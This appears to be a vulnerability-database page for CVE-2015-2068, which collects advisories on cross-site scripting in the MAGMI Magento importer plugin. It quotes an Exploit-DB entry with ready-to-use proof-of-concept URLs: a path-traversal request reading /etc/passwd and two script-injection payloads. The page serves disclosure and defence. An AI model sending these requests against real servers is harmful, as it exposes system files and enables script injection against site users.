CVE-2015-2068
published 2015-02-24CVE-2015-2068: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject…
PriorityP428medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
14.04%
96.1th percentile
Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dweeves | magmi | >= 0 < 0.7.22 | 0.7.22 |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
MAGMI cross-site scripting (XSS)
osv·2022-05-13
CVE-2015-2068 [MEDIUM] MAGMI cross-site scripting (XSS)
MAGMI cross-site scripting (XSS)
Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
GHSA
MAGMI cross-site scripting (XSS)
ghsa·2022-05-13
CVE-2015-2068 [MEDIUM] CWE-79 MAGMI cross-site scripting (XSS)
MAGMI cross-site scripting (XSS)
Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
No detection rules found.
Exploit-DB
Magento Server MAGMI Plugin - Multiple Vulnerabilities
exploitdb·2015-02-05
CVE-2015-2068 Magento Server MAGMI Plugin - Multiple Vulnerabilities
Magento Server MAGMI Plugin - Multiple Vulnerabilities
---
Exploit Title: Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting
Software Link: http://sourceforge.net/projects/magmi/
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 5-2-2015
Exploit(Local file inclusion) :
http://{Server}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
Screenshot: http://secupent.com/exploit/images/magmilfi.jpg
Exploit(Cross Site Scripting):
1. http://{Server}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
2. http://{Server}/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script
Nuclei
Magento Server Mass Importer - Cross-Site Scripting
nuclei·CVSS 4.3
CVE-2015-2068 [MEDIUM] Magento Server Mass Importer - Cross-Site Scripting
Magento Server Mass Importer - Cross-Site Scripting
Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
Template:
id: CVE-2015-2068
info:
name: Magento Server Mass Importer - Cross-Site Scripting
author: daffainfo
severity: medium
description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject mali
http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.htmlhttp://www.exploit-db.com/exploits/35996http://www.securityfocus.com/bid/74879http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.htmlhttp://www.exploit-db.com/exploits/35996http://www.securityfocus.com/bid/74879
2015-02-24
Published